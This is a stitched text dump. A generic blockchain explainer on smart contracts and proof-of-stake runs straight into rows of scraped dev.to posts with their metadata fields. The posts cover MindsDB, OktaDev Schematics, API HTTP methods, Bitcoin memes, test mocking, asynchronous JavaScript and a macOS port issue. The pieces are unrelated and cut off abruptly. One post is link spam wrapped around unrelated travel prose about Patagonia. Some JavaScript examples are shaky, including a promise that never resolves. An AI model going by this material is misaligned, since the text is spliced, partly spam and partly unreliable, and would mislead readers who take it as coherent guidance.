Pioneered by Bitcoin, cryptocurrency transfer apps are exploding in popularity right now. Blockchain is especially popular in finance for the money and time it can save financial companies of all sizes.
By eliminating bureaucratic red tape, making ledger systems real-time and reducing third-party fees, blockchain can save the largest banks lots of money. These companies use blockchain to efficiently transfer money.
Blockchain Smart Contracts
Smart contracts are like regular contracts except the rules of the contract are enforced in real-time on a blockchain, which eliminates the middleman and adds levels of accountability for all parties involved in a way not possible with traditional agreements. This saves businesses time and money, while also ensuring compliance from everyone involved.
Blockchain-based contracts are becoming more and more popular as sectors like government, healthcare and the real estate industry discover the benefits. Below are a few examples of how companies are using blockchain to make contracts smarter.
Blockchain in Healthcare
Blockchain in healthcare, though early in its adoption, is already showing some promise. In fact, early blockchain solutions have shown the potential to reduce healthcare costs, improve access to information across stakeholders and streamline businesses processes. An advanced system for collecting and sharing private information could be just what the doctor ordered to make sure that an already bloated sector can trim down exorbitant costs.
Blockchain Logistics
A major complaint in the shipping industry is the lack of communication and transparency due to the large number of logistics companies crowding the space. According to a joint study by Accenture and logistics giant DHL, there are more than 500,000 shipping companies in the US, causing data siloing and transparency issues. The report goes on to say blockchain can solve many of the problems plaguing logistics and supply chain management.
The study argues that blockchain enables data transparency by revealing a single source of truth. By acknowledging data sources, blockchain can build greater trust within the industry. The technology can also make the logistics process leaner and more automated, potentially saving the industry billions of dollars a year. Blockchain is not only safe, but a cost-effective solution for the logistics industry.
Blockchain and NFTs
Non-fungible tokens (NFTs) have been the hottest blockchain application since cryptocurrency. The year 2021 brought a rise in these digital items that are currently taking the world by storm. NFTs are simply digital items, like music, art, GIFs and videos that are sold on a blockchain, ensuring that a sole owner can claim full rights to it. Thanks to blockchain technology, consumers can now claim sole ownership over some of the most desirable digital assets out there.
Blockchain in Government
One of the most surprising applications for blockchain can be in the form of improving government. As mentioned previously, some state governments like Illinois are already using the technology to secure government documents, but blockchain can also improve bureaucratic efficiency, accountability and reduce massive financial burdens. Blockchain has the potential to cut through millions of hours of red tape every year, hold public officials accountable through smart contracts and provide transparency by recording a public record of all activity, according to the New York Times.
Blockchain may also revolutionize our elections. Blockchain-based voting could improve civic engagement by providing a level of security and incorruptibility that allows voting to be done on mobile devices.
The following companies and government entities are a few examples of how blockchain applications are improving government.
Blockchain in Media
Many of the current problems in media deal with data privacy, royalty payments and piracy of intellectual property. According to a study by Deloitte, the digitization of media has caused widespread sharing of content that infringes on copyrights. Deloitte believes blockchain can give the industry a much needed facelift when it comes to data rights, piracy and payments.
Blockchain’s strength in the media industry is its ability to prevent a digital asset, such as an mp3 file, from existing in multiple places. It can be shared and distributed while also preserving ownership, making piracy virtually impossible through a transparent ledger system. Additionally, blockchain can maintain data integrity, allowing advertising agencies to target the right customers, and musicians to receive proper royalties for original works.
WHAT IS PROOF-OF-STAKE (POS)?
Proof-of-stake underlies certain consensus mechanisms used by blockchains to achieve distributed consensus. In proof-of-work, miners prove they have capital at risk by expending energy. Ethereum uses proof-of-stake, where validators explicitly stake capital in the form of ETH into a smart contract on Ethereum. This staked ETH then acts as collateral that can be destroyed if the validator behaves dishonestly or lazily. The validator is then responsible for checking that new blocks propagated over the network are valid and occasionally creating and propagating new blocks themselves.
Proof-of-stake comes with a number of improvements to the now-deprecated proof-of-work system:
• Better energy efficiency – there is no need to use lots of energy on proof-of-work computations
• Lower barriers to entry, reduced hardware requirements – there is no need for elite hardware to stand a chance of creating new blocks
• Reduced centralization risk – proof-of-stake should lead to more nodes securing the network
• Because of the low energy requirement less ETH issuance is required to incentivize participation
• Economic penalties for misbehaviour make 51% style attacks exponentially more costly for an attacker compared to proof-of-work
• The community can resort to social recovery of an honest chain if a 51% attack were to overcome the crypto-economic defenses.
VALIDATORS
To participate as a validator, a user must deposit 32 ETH into the deposit contract and run three separate pieces of software: an execution client, a consensus client, and a validator. On depositing their ETH, the user joins an activation queue that limits the rate of new validators joining the network. Once activated, validators receive new blocks from peers on the Ethereum network. The transactions delivered in the block are re-executed, and the block signature is checked to ensure the block is valid. The validator then sends a vote (called an attestation) in favor of that block across the network.
Whereas under proof-of-work, the timing of blocks is determined by the mining difficulty, in proof-of-stake, the tempo is fixed. Time in proof-of-stake Ethereum is divided into slots (12 seconds) and epochs (32 slots). One validator is randomly selected to be a block proposer in every slot. This validator is responsible for creating a new block and sending it out to other nodes on the network. Also in every slot, a committee of validators is randomly chosen, whose votes are used to determine the validity of the block being proposed.
What is a Proof of Stake (PoS) consensus algorithm?
A Proof of Stake (PoS) consensus algorithm is a set of rules governing a blockchain network and the creation of its native coin, that is, it has the same objective as a Proof of Work (PoW) algorithm in the sense that it is an instrument to achieve consensus. Unlike PoW, there are no miners involved in the process. Instead, participants in the network who want to be involved in proving the validity of network transactions and creating blocks in a PoS network have to hold a certain stake in the network, for instance by placing a certain amount of the network’s currency in a wallet connected to its blockchain.
This is known as “placing a stake” or “staking”. A block creator in a PoS system is limited to creating blocks proportionate to his or her stake in the network. Thus, PoS networks are based on deterministic algorithms, meaning that validators of blocks are elected depending on the nature of the stake. For instance, selecting account balance as the sole criterion on which the next valid block in a blockchain is defined could potentially lead to unwanted centralisation. This would mean that wealthy members in a network would enjoy great advantages.
| motseki | |
1,238,310 | which were a strange blue, like that of toothpaste or laundry detergent? | As I explored farther, I began to see the glacier's arteries and veins, which were a strange blue,... | 0 | 2022-11-01T08:26:35 | https://dev.to/likelylifestyle/which-were-a-strange-blue-like-that-of-toothpaste-or-laundry-detergent-5d0j | javascript, react, devops, html | As I explored farther, I began to see the glacier's arteries and veins, which were a strange blue, like that of toothpaste or laundry detergent. Water from [drift hunters](https://drifthunters2.io) sapphire ponds was bottled and it was icy and minerally. For a little while, the winds died down within this cocoon. When we returned over the lake and back down into the steppe, though, they sprang back to life with a roar.
El Calafate, where I was staying, and El Chaltén are the only two cities in this region of Argentine Patagonia (where I was headed). The resort town of El Calafate has been there for quite some time, perched on the edge of the small harbor of Bahia Redonda on Lago Argentino. There are chocolate manufacturers, barbeque restaurants, and gift stores selling bittersweet jams produced from the berries of the town's namesake plant that line its pine-shaded avenues, providing a welcome splash of green on the otherwise parched steppe.
To get to El Chaltén, the neighboring village, I had to drive four hours north over green plains mowed by skittish guanacos, the wild relatives of the llama. Only one roadhouse, La Leona, was found along the journey. It was located off of National Route 40. The American criminals Butch Cassidy and the Sundance Kid are said to have crashed there in 1905 after stealing a bank there. Over the next decades, La Leona was frequented by hikers looking to begin their ascents of the gnarled peaks seen in the distance, including Mount Fitz Roy. It wasn't until 2021 that El Chaltén, "Argentina's newest town," which had been a popular destination for hikers and climbers since the 1980s, could host a public cemetery. | drifthunters |
1,238,603 | Predicting Mobile Phone Prices with MindsDB | Introduction MindsDB is an Open-Source AI Layer for databases, For more details,... | 0 | 2022-11-04T17:31:35 | https://dev.to/learnearnfun/predicting-mobile-phone-prices-with-mindsdb-138 | datascience, database, ai, machinelearning |

## Introduction
MindsDB is an Open-Source AI Layer for databases, For more details, Checkout this [blog](https://dev.to/learnearnfun/quickstart-to-mindsdb-1ifm) to know more
This tutorial will teach you how to train a model to predict mobile worth based on many variables, such as clock_speed, battery_power, dual_sim, etc.. with MindsDB
## Importing Data into MindsDB Cloud
In order to import the dataset to MindsDB Cloud, we need to first download it from Kaggle and then upload it simply to MindsDB using the steps mentioned below.
_**Step 1**_: Create a [MindsDB Cloud](https://cloud.mindsdb.com) Account, If you already haven't done so

_**Step 2**_: Download this [Dataset](https://www.kaggle.com/datasets/iabhishekofficial/mobile-price-classification)

**_Step 3_**: Go into Add Data -> Files -> Import File
Lastly Add the dataset (After downloading you will get a .zip file, You have to extract it and import the csv inside)

_**Step 4**_: Name the Table

**_Step 5_**: To verify the dataset has successfully imported in:
Run this Query:
```
SHOW TABLES FROM files;
```
If you see the dataset, then it's imported successfully!
We have imported our dataset into MindsDB, next up we will be creating a Predictor Model!
## Training a Model
**_Step 1_**: Creating a Predictor Model
MindsDB provides a syntax which exactly does that!
```
CREATE PREDICTOR mindsdb.predictor_name (Your Predictor Name)
FROM database_name (Your Database Name)
(SELECT columns FROM table_name LIMIT 10000) (Your Table Name)
PREDICT target_parameter; (Your Target Parameter)
```
Simply replace the paramaters with the ones you want to use
```
CREATE PREDICTOR mindsdb.mobileprice_predictor
FROM files
(SELECT * FROM MobilePrices LIMIT 10000)
PREDICT price_range;
```

**_Step 2_**: Based on the size of the dataset, it might take some time.
There's 3 stages once you run the command to create the model:
1. _**Generating**_: The model's generating!
2. _**Training**_: Model is getting trained with the dataset
3. _**Complete**_: The model is ready to do predictions
To check the status, this is the query:
```
SELECT status
FROM mindsdb.predictors
WHERE name='mobileprice_predictor'
```
Once it returns `complete` we can start predicting with it!

## Describe the Model
Before we proceed to the final part of predicting mobile phone prices, let us first understand the model that we just trained.
MindsDB provides the following 3 types of descriptions for the model using the DESCRIBE statement.
1. By Features
2. By Model
3. By Model Ensemble
### By Features
```
DESCRIBE mindsdb.predictor_model_name.features;
```

This query shows the role of each column for the predictor model along with the type of encoders used on the columns while training.
### By Model
```
DESCRIBE mindsdb.predictor_model_name.model;
```

This query shows the list of all the underlying candidate models that were used during training. The one with the best performance (whose value is 1), is selected. You can see the value 1 for the selected one in the selected column while others are set at 0.
### By Model Ensemble
```
DESCRIBE mindsdb.predictor_model_name.ensemble;
```

This query gives back a JSON output that contains the different parameters that helped to choose the best candidate model for the Predictor Model.
As we are done understanding our Predictor model, let's move on to predicting values.
## Predicting the Target Value
We will start by predicting that only 1 feature parameter is supported by price_range and therefore the query should look like this.
NOTE: While predicting always input multiple feature parameters as the prediction accuracy degrades.
```
SELECT price_range
FROM mindsdb.mobileprice_predictor
WHERE dual_sim ='0';
```

The predicted price range should be 0
```
SELECT price_range
FROM mindsdb.mobileprice_predictor
WHERE touch_screen ='0' and int_memory = 51;
```

The price range should be 3
Mobilistic! We have now successfully predicted the mobile phone price range with MindsDB
## Conclusion
This concludes the tutorial here.
Lastly, before you leave, I would love to know your feedback in the Comments section below and it would be really great if you drop a `LIKE` on this article.
| hridya423 |
1,238,660 | Quick JavaScript Authentication with OktaDev Schematics | Original post written by Matt Raible for Auth0 blog. Learn how to use OktaDev Schematics... | 0 | 2022-11-01T13:14:23 | https://auth0.com/blog/quick-javascript-authentication/?utm_source=devto&utm_medium=sc&utm_campaign=devto | javascript, programming, security | > Original post written by [Matt Raible](https://auth0.com/blog/authors/matt-raible/) for Auth0 blog.
### Learn how to use OktaDev Schematics to add authentication to your JavaScript projects.
### <br>
Hello,
My name is Matt Raible, and I am a developer advocate at Okta. In early 2019, I created OktaDev Schematics to simplify my life when doing Angular demos. But let me step back a bit first. I've worked at Okta for over five years; before that, I was an independent consultant for 20 years, mainly doing Java and web development for clients.
I've learned a lot about OpenID Connect (OIDC) and Okta's JavaScript SDKs over the years and only recently tried to use Auth0's JavaScript SDKs. Over the last couple of weeks, I learned how to use them and integrated many into OktaDev Schematics.
I was pleasantly surprised by the experience because the configuration often boils down to two main values: `domain` and `clientId`. You do have to add callback URLs too, but these are often the same as your app's homepage, so you don't need to add routes in your application. And then, it just works! There's no need to worry about issuers or other OIDC concepts.
This is a strong departure from how we've done things in Okta's SDKs, where we expect people to know about OpenID Connect. We often try to educate developers about OAuth and OIDC, but since these topics are complex, they can be challenging to understand. I like the approach of just needing two values, and everything just works!
## What Is OktaDev Schematics?
[OktaDev Schematics](https://github.com/oktadev/schematics) is a tool I developed to help streamline the integration of OpenID Connect into JavaScript (or TypeScript) applications.
In my first few years at Okta, I'd demo how to use our Angular SDK at conferences, and I'd inevitably miss a step, causing the demo to fail. A failing demo is frustrating, so I created OktaDev Schematics to fix it.
My idea was simple:
1. Create an app using the framework's CLI
2. Integrate OIDC authentication using templates
3. Add a unit test to prove nothing breaks
The project builds on [Angular Schematics](https://angular.io/guide/schematics), so it's incredibly easy to use, particularly in Angular projects, but applies to other frameworks as well.
```shell
ng add @oktadev/schematics
```
This command will prompt you for an issuer and client ID, and then OktaDev Schematics will configure your app to use them. If you're using the [Auth0 CLI](https://github.com/auth0/auth0-cli), you'll need to create a Single-Page Application (SPA) app to get these values.
```shell
auth0 apps create
```
> 💡 TIP: You can also create a SPA app using [the Auth0 dashboard](https:///manage.auth0.com) if you prefer GUIs over CLIs.
In the latest release, I've made it so that adding an `--auth0` flag will set up your project to use Auth0 instead of Okta.
{% twitter 1566907778161049600 %}
- Angular: `ng new` and `ng add @oktadev/schematics --auth0`
- Ionic: `ionic start` and `ng add @oktadev/schematics --auth0`
My [Add OpenID Connect to Angular Apps Quickly](https://auth0.com/blog/add-oidc-to-angular-apps-quickly/) tutorial explains what this command does and shows screenshots of the changes. You can even [view the changes it makes on GitHub](https://github.com/oktadev/auth0-angular-example/pull/1/files).
The tool is smart enough to detect the framework you're using and if you're using TypeScript or JavaScript.
If you want to create a React or Vue app, you'll need to perform a few steps:
1. Create your React app with Create React App:
```
npx create-react-app secure-app
```
> 💡 TIP: Add `--template typescript` if you want TypeScript support.
For Vue, use `npx @vue/cli create secure-app`.
2. Install the Schematics CLI globally:
```
npm i -g @angular-devkit/schematics-cli
```
3. In the `secure-app` project, install OktaDev Schematics and run the `add-auth` schematic:
```
npm i -D @oktadev/schematics
schematics @oktadev/schematics:add-auth
```
As you can guess, the integration is pretty bare-bones. It configures the SDK and adds a login/logout button. I believe this is in line with the apps each CLI generates. They're pretty bare-bones too!
If you'd like to see how the templates differ between Okta and Auth0, you can [view the templates on GitHub](https://github.com/oktadev/schematics/tree/main/src/add-auth). If you have a GitHub account, you can also [launch github.dev/oktadev/schematics](https://github.dev/oktadev/schematics) and navigate to `src/add-auth/{auth0,okta}`.

## JavaScript Framework Support
There's a wealth of popular frameworks currently supported by OktaDev Schematics:
- [Angular](https://github.com/oktadev/schematics#angular)
- [React](https://github.com/oktadev/schematics#react)
- [Vue](https://github.com/oktadev/schematics#vue)
- [Ionic with Angular](https://github.com/oktadev/schematics#ionic)
- [React Native](https://github.com/oktadev/schematics#react-native)
- [Express](https://github.com/oktadev/schematics#express)
See the project's [links section](https://github.com/oktadev/schematics#links) if you want to learn more about Okta or Auth0's SDKs.
The support for Ionic currently only includes Angular. However, Ionic does support React and Vue too. To make OIDC authentication work, I leveraged [Ionic AppAuth](https://github.com/wi3land/ionic-appauth). One cool thing about this library is it has [React](https://github.com/wi3land/ionic-appauth/tree/master/demos/react) and [Vue](https://github.com/wi3land/ionic-appauth/tree/master/demos/vue) examples available. I recently updated these to work with Capacitor 4.
{% twitter 1566829762026291200 %}
[Read more...](https://auth0.com/blog/quick-javascript-authentication/?utm_source=devto&utm_medium=sc&utm_campaign=devto) | robertinoc_dev |
1,238,761 | Video: An Intro to AI Builder on Power Automate | A new video this week. Bringing a quick introduction to the AI Builder feature on Power... | 0 | 2022-11-10T20:07:14 | https://barretblake.dev/2022/11/video-an-intro-to-ai-builder-on-power-automate/?utm_source=rss&utm_medium=rss&utm_campaign=video-an-intro-to-ai-builder-on-power-automate | development, video, aibuilder, flow | ---
title: Video: An Intro to AI Builder on Power Automate
published: true
date: 2022-11-01 14:30:00 UTC
tags: Development,Video,AIBuilder,flow
canonical_url: https://barretblake.dev/2022/11/video-an-intro-to-ai-builder-on-power-automate/?utm_source=rss&utm_medium=rss&utm_campaign=video-an-intro-to-ai-builder-on-power-automate
---
A new video this week. Bringing a quick introduction to the AI Builder feature on Power Automate.
<iframe title="A Quick Introduction to AI Builder On Power Automate" width="1200" height="675" src="https://www.youtube.com/embed/0b8nfyR0AKY?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
The post [Video: An Intro to AI Builder on Power Automate](https://barretblake.dev/2022/11/video-an-intro-to-ai-builder-on-power-automate/) first appeared on [Barret Codes](https://barretblake.dev). | barretblake |
1,238,843 | Bitcoin Blockchain Bullshit? | American Chopper Senior and Junior have strong opinions about BBB - Bitcoin, Blockchain and the... | 0 | 2022-11-01T15:54:56 | https://dev.to/jmfayard/bitcoin-blockchain-bullshit-b6c | watercooler, healthydebate, blockchain, bitcoin | American Chopper Senior and Junior have strong opinions about BBB - Bitcoin, Blockchain and the Bullshit around it.
## Is Bitcoin a real currency?
_Image is too small to be readable? Click on it_

*Background: people don't wake up every morning wondering if the euro or the dollar are up or down. Instead they try to produce things of value, and use a currency to exchange it against something else. The currency itself is not the end goal.*
## Blockchain over-engineering?
_Image is too small to be readable? Click on it_

See:
* [Merkle tree - Wikipedia](https://en.wikipedia.org/wiki/Merkle_tree)
* [Consensus (computer science) - Wikipedia](https://en.wikipedia.org/wiki/Consensus_(computer_science))
## Bad Central Banks?

See [Crypto-anarchism - Wikipedia](https://en.wikipedia.org/wiki/Crypto-anarchism)
## Burning precious limited resources?

* [Bitcoin energy consumption 2022 | Statista](https://www.statista.com/statistics/881541/bitcoin-energy-consumption-transaction-comparison-visa/)
* [Resource depletion - Wikipedia](https://en.wikipedia.org/wiki/Resource_depletion)
* [Climate change - Wikipedia](https://en.wikipedia.org/wiki/Climate_change)
## Bigger images please?
I'm a backend developer so I don't understand CSS and why the images are so small currently.
Here they are in full resolution
* [Bitcoin is not a real currency](https://imgflip.com/i/6z403x)
* [Why do you want to put everything on the blockchain?](https://imgflip.com/i/6z40gr)
* [Bad Central Banks?](https://imgflip.com/i/6z41a7)
* [The planet is burning](https://imgflip.com/i/6z40uw)
| jmfayard |
1,238,845 | Top ways to call an API | If you want to build your million-dollar startup or a hobby project, first, you need a server that... | 0 | 2022-11-01T16:19:05 | https://dev.to/vegan_tech/top-ways-to-call-an-api-3f8a | api, testing | If you want to build your million-dollar startup or a hobby project, first, you need a server that manages your data and logic. To build a server, you need to know how a server works.
A server usually contains multiple APIs. APIs are like a road that is used to send and receive data. Each API can be called in many different ways. Today I'll show you some of those ways.
First of all, we need an API server. You can create your own server using your favorite programming language, or you can use services like https://webhook.site, which lets you test APIs without needing to create a server.
Now we're going to demonstrate the ways to call APIs using the [Postman](https://www.postman.com) and the [API Tester](https://apitester.org) (supports Android & iOS).
**1. GET**
The GET is the most popular way to call an API. It can be called from a browser directly. However, as the name describes, it is usually used to fetch data from the server.
To call an API using the GET method, in Postman, select GET(1), input the API URL(2), and hit send(3).

The webhook page shows that the API got called using the GET method.

Let's do the same using the API Tester APP (which supports Android & iOS ). First, open the app and click on the Create new request button.

From there, click on GET.

Then input the webhook URL and click the send button at the top-right corner.

You'll see there's a new call to the API with the GET method.

**2. POST**
The POST method is usually used to send data to the server from the app. For example, to call an API using the POST method, in Postman, select POST, input the API URL, and hit send.

Or, if you prefer your smartphone, in the API Tester app, create a new request using the POST option.

Then input the API URL and click send.

In the webhook page, you'll see it got called using the POST method.

**3. PUT**
The PUT method is usually used to send data to the server from the app but to change or update specific data. For example, to call an API with the PUT method, in Postman, select PUT, input the API URL, and hit send.

Or, with the API Tester app, create a new request using the PUT option.

Then input the API URL and click send.

In the webhook page, you'll see it got called using the PUT method.

**4. DELETE**
The DELETE method is usually used to delete one or multiple data. To call an API with the DELETE method, in Postman, select DELETE, input the API URL, and hit send.

In the API Tester app, create a new request using the DELETE option.

Then input the API URL and click send.

In the webhook page, you'll see it got called using the DELETE method.

These are not just all, and there are other methods like PATCH, COPY, HEAD, and so on.

All these methods can be found in the API Tester app. In addition, the API Tester app has even more methods to call APIs out of the box. Here are some screenshots of the supported methods in the API Tester app.



You can also call an API with a custom method of your own. Maybe your name or your company name, or your app name.
If you want to test different APIs from your phone, give the API Tester app a try. It's free and supports Android & iOS.
Now that you have created a server with multiple APIs, you want to protect it from hackers. Learn the top ways you can protect your server from hackers in my previous [post.](https://dev.to/vegan_tech/top-ways-to-secure-apis-from-hackers-4jl7)
| vegan_tech |
1,238,853 | Monthly Challenge #1: Palindrome 🔤 | Welcome to Codédex's first ever Monthly Twitter Challenge! This one is created by our SWE Intern,... | 20,371 | 2022-11-01T16:39:08 | https://dev.to/codedex/monthly-twitter-challenge-1-palindrome-3hg6 | python, challenge, beginners, codedex | Welcome to Codédex's first ever Monthly Twitter Challenge! This one is created by our SWE Intern, @asiqurrahman. 🙌
{% embed https://twitter.com/codedex_io/status/1587072993448058883 %}
**Palindrome:**
A word, sentence, or number that reads the same forward or backward (e.g., _racecar_, _civic_, and _121_).
**Challenge:**
Create a Python function that:
1. Takes in a string as a parameter.
2. Checks if it's a palindrome.
3. Returns `True` if it is or `False` if it's not.
**Requirements:**
- 📦 Don’t use any packages.
- 💬 Make sure to comment the code.
Post your program screenshot in the [Twitter thread](https://twitter.com/codedex_io/status/1587072993448058883).
And we will pick a random winner by noon this Friday. The prize is a free [Codédex tee](https://codedex.myshopify.com) and bragging rights! 🏆
---
_**Update:**_
We have a winner to the Codédex Monthly Challenge: Palindrome! 🥁...
Congrats to Michael Gonzalez! 🇪🇨
The reasons being:
- Solution covers string & number
- Good comments
- Good breakdown of the functions
- First to post bonus
Here's the solution:
{% embed https://twitter.com/mgonzalez14291/status/1587105952607703040 %} | sonnynomnom |
1,239,084 | API Mocking: Essential and Redundant | I love contradictions where both states of truth can work at the same time. Case in point this tweet... | 0 | 2022-11-01T18:42:38 | https://debugagent.com/api-mocking-essential-and-redundant | java, testing, programming, tutorial | I love contradictions where both states of truth can work at the same time. Case in point this tweet about mocking from the other week:
[](https://twitter.com/mcsee1/status/1582762075289374720)
> If you use mocks, you are not testing.
My answer was:
[](https://twitter.com/debugagent/status/1582919132856864768)
> Mocks help assert limited fixed functionality and they do it FAST.
>
> Which is what unit tests are about. Mocks are an essential part of a wider quality strategy. Otherwise you will spend your time in integration test churn.
>
> No, they are not enough. But they do test.
It would seem we are both saying the exact opposite but in fact that isn’t necessarily the case. I get what Maxi is saying here and his point is very valid. Mocks are problematic.
## The Problems with Mocks
Mocks hide external dependencies on the real API and as a result they don't test them. This limits the scope of the test to a very narrow, hard-coded set. It relies on internal implementation details such as the dependencies to implement the test, that means the test will probably fail if the implementation changes even though the contract doesn’t change e.g. let’s look at an example:
```java
public int countUserCities() {
return db.executeInt(“select count(“city”) from users”);
}
```
We can mock the db function executeInt since the returned result will be bad. But this will break if we change the original API call to something like this:
```java
public int countUserCities() {
return db.count(“city”,”users”);
}
```
This covers nothing. A far better approach is to add fake data to a temporary database which is exceedingly easy to do thanks to projects such as [Testcontainers](https://www.testcontainers.org/). We can spin up containers dynamically and “properly” check the method with a database similar to the one we have in production. This performs the proper check, it will fail for bugs like a typo in the query and doesn’t rely on internal implementation.
Unfortunately, this approach is problematic. Loading a fresh database takes time. Even with containers. Doing it for every suite can become a problem as the scope of testing grows. That’s why we separate the unit and integration tests. Performance matters.
## The Performance Problem
You know what’s the worst type of testing?
The ones you don’t run and end up deleting.
Testing frequently is crucial, continuous testing lets us fail quickly during development. A quick failure means our developer mode is still fresh on the change that triggered the failure. You don’t need git bisect, you can fix things almost instantly. For this to work properly we need to run testing cycles all the time. If it takes a while to go through a testing workflow and requires some configuration (e.g. docker etc.) which might collide with CPU architecture too (e.g. M1 Mac), then we might have a problem.
We mock external dependencies for the unit test so performance will improve. But we can’t give up on the full call to the actual API because the mocking has issues. However, these can run in the CI process, we don’t need to run them all the time. Does this breed duplication: yes. It sucks and I don’t like it.
Unfortunately, there’s no other way I’m aware of at this time. I tried to think about a way around this with code that would act as a unit test in one execution and as an integration test invoking the real counterpart when running in CI. But I couldn’t come up with something workable that didn’t make things worse.
Because of this I think it’s important to check coverage of integration tests only. The unit test coverage is interesting but not as crucial as the integration coverage. I’m not in favor of 100% coverage. But it is an important statistic to monitor.
## What Should We Mock?
I gave the database example but I’m not in favor of mocking databases. For Java I typically use a light in-memory database which works well with most cases. Fakers accept CSV formats to fill up the database and can even come up with their own fake data. This is better than mocking and lets us get close to integration test quality with unit test performance.
However, we can’t constantly connect to Web Service dependencies without mocking. In that sense I think it’s a good idea to mock everything that’s outside of our control. In that point we face the choice of where to mock. We can use mock servers that include coded requests and responses. This makes sense when working with an integration test. Not so much for a unit test, but we can do it if the server is stateless and local. I'd prefer mocking the call to the API endpoints in this case though. It will be faster than the actual API but it could still cause problems.
Over-mocking is the process of applying mocks too liberally to too many API calls. A developer might engage in that in order to increase the coveted coverage metric. This further strengthens my claim that coverage shouldn't apply to unit tests as it might lead to such a situation. Behavior shouldn't be mocked for most local resources accessed by a framework.
## Finally
I love mocking. It made the development of some features possible. Without it I couldn't properly check plugins, APIs, servers, etc. However, like all good sweets. Too much of a "good thing" can corrupt our code. It's also a small part of a balanced meal (stretching the metaphors but it works). We can just build functional tests and call it the day, we can't just rely on mocking. On the contrary, they aren't the "real" badge of quality we seek.
Integration testing occupies that spot. When we have coverage, there we have important, valuable coverage. Mocking is wonderful for narrowing down problems and avoiding regressions. When I need to check that a fix is still in place, mocked testing is the perfect tool. Development of such components is problematic and fragile. But that's a good thing, we want that code to be tied to the implementation a bit.
Some operations would be difficult to cover without proper mocking. When testing the entire system that might be reasonable to expect but not for functional testing. In these cases, we need a fast response and the actual API might not be enough.
| codenameone |
1,239,096 | Asynchronous processing in JavaScript | This is a continuation of Introduction to node and npm 1. Introduction JavaScript engines... | 0 | 2023-04-15T13:48:36 | https://dev.to/adderek/asynchronous-processing-in-javascript-5adh | javascript, beginners | This is a continuation of [Introduction to node and npm](https://dev.to/adderek/intro-to-node-and-npm-3apd)
## 1. Introduction
JavaScript engines are generally single-threaded. Long call processing would normally block any other call but we leverage asynchronous processing to interrupt currently executed procedure allowing engine to switch between the jobs. Behind the scenes Input/Output is multi-threaded.
There are many ways JS developers could achieve effects similar to multi-threading.
## 2. How asynchronous processing works
You send a message (ex. a request to process a resource like "add a new user to the system") and usually get a confirmation that the request was received. In REST this might be 202 (Accepted) and "location" header, in messaging systems a valid _ID of the request_.
But the message is only queued for processing, not yet processed.
Whenever system has free resources (ex. is not doing anything more important or queued before your request) then your request could be processed. This takes usually between milliseconds and weeks. It could be for example a request to add a new bank account that must be verified by someone.
When requesting something, often a feedback (confirmation and/or return data) is expected. This is usually done using message sent by the processing system to a place you can access. Often it would contain "correlation-id" that is the _ID of the request_ to indicate it is a response to previous request. Simply saying: We cannot send response (not yet) but we can send instruction (ex. URL) to check if it was already finished.
## 3. Several attempts to use asynchronous processing
### 3.1. How the code execution gets postponed
In JavaScript calls could be postponed whenever you use a promise (or async/await which is using promises behind the scene).
```
async function log1(msg) {
await console.log(msg);
}
async function log2(msg) {
console.log(msg);
}
function log3(msg) {
console.log(msg);
}
function log4(msg) {
return new Promise(resolve=>console.log(msg));
}
setTimeout(()=>log1(1), 0);
setTimeout(()=>log2(2), 0);
setTimeout(()=>log3(3), 0);
setTimeout(()=>log4(4), 0);
```
Usually prints 1,2,3,4 as expected.
Internally those are 4 different calls scheduled to happen with 0ms delay (no delay). And the order of execution doesn't need to keep the sequence.
`log1` is async (returns a promise) and stops execution when calling `console.log` because there is `await`. Once called, the promise is not yet fulfilled - it would be after `console.log` returned,then `log1` could continue, and finally it returns. You are sure that `console.log` returns before `log1` gets fulfilled (only because there is "await").
`log2` is async (returns a promise) and triggers `console.log` and returns. You have no guarantee that `console.log` prints output before `log2` gets fulfilled.
`log3` is just a function. The `console.log` might be scheduled but `log3` returns and continues to execute your code. The JavaScript thread is blocked until it returns (though it can schedule some promises).
`log4` returns a promise. Its execution could be delayed (then you see that returned promise is "pending" until it gets "fulfilled").
Think about it thoroughly and you could also omit `setTimeout` in 3 out of 4 cases - then call is made and a "pending promise" is returned. In fact the case of `log3` is probably most dangerous.
If you are using node, then internally [libuv](https://github.com/libuv/libuv) is used for calls and also for anything like input/output (ex. to print something onto the console).
### 3.2. Calling other applications
You can sent a request to another system, service or application. You can send a REST request and should wait for the response (even "Accepted" when task is only queued). Or publish this to a queue yourself.
### 3.3. Workers
Node can run parallel instances of node called "workers". Workers can act as a parallel process to perform heavy work without blocking the main thread.
## 4. What to look at
### 4.1. Intervals
You can schedule a method to be called with a fixed interval:
```
let counter = 0;
let intervalHandle = undefined;
const intervalInMilliseconds = 10;
function myMethod() {
counter++;
for(let i = 0; i < 9999; i++){console.log(i);}
if(counter > 10) {
clearInterval(intervalHandle);
intervalHandle = null;
}
}
intervalHandle = setInterval(myMethod, intervalInMilliseconds);
```
You could expect that it prints number from 0 to 9999 every 10ms until 10 iterations are made within 100ms.
The issue is that you have no guarantee that methods would be called every 10ms. This could lead to 2 problems:
- Your method could be called more than once at the same time (if it is using asynchronous processing internally)
- Your method could be executed with longer interval (it needs to print the numbers first)
A bit corrected code:
```
let counter = 0;
const minimumIntervalInMilliseconds = 10;
function myMethod() {
counter++;
for(let i = 0; i < 9999; i++){console.log(i);}
if(counter <= 10) {
setTimeout(myMethod, minimumIntervalInMilliseconds);
}
}
setTimeout(myMethod, minimumIntervalInMilliseconds);
```
## 4. Dangers of single-threaded app
If your application runs inside a docker container that has a healthcheck and restarts whenever healthcheck is not responded (ex. timeout 1s, interval 1s), then any job blocking main thread for 1000ms would result in container being restarted.
If your app runs on kubernetes and your is blocked over the timeout threshold then your application might be "disconnected" (readiness probe) or restarted (liveness probe).
If you are connected to a queue (ex. kafka or RabbitMQ) and your application is busy for the timeout (ex. 3000ms for kafka subscriber) then your application will be kicked-out and considered "dead". I have seen this scenario where developers tried to update RabbitMQ and its libraries searchign for an issue in the server - where the cause was in the node code. | adderek |
1,239,164 | Port 5000 is already in use macOS Monterey | After an update on my laptop, I got an issue. I have started the Docker container, but it fails. The... | 0 | 2022-11-01T20:10:32 | https://jakeroid.com/blog/port-5000-is-already-in-use-in-macos-monterey/ | macos, docker | <!-- wp:paragraph -->
<p>After an update on my laptop, I got an issue. I have started the Docker container, but it fails. The port 5000 is already in use. Hmm, maybe another container took it. Ah, Airplay took it... Did you get the same issue? Let's fix it. </p>
<!-- /wp:paragraph -->
<!-- wp:more -->
<!--more-->
<!-- /wp:more -->
<!-- wp:paragraph -->
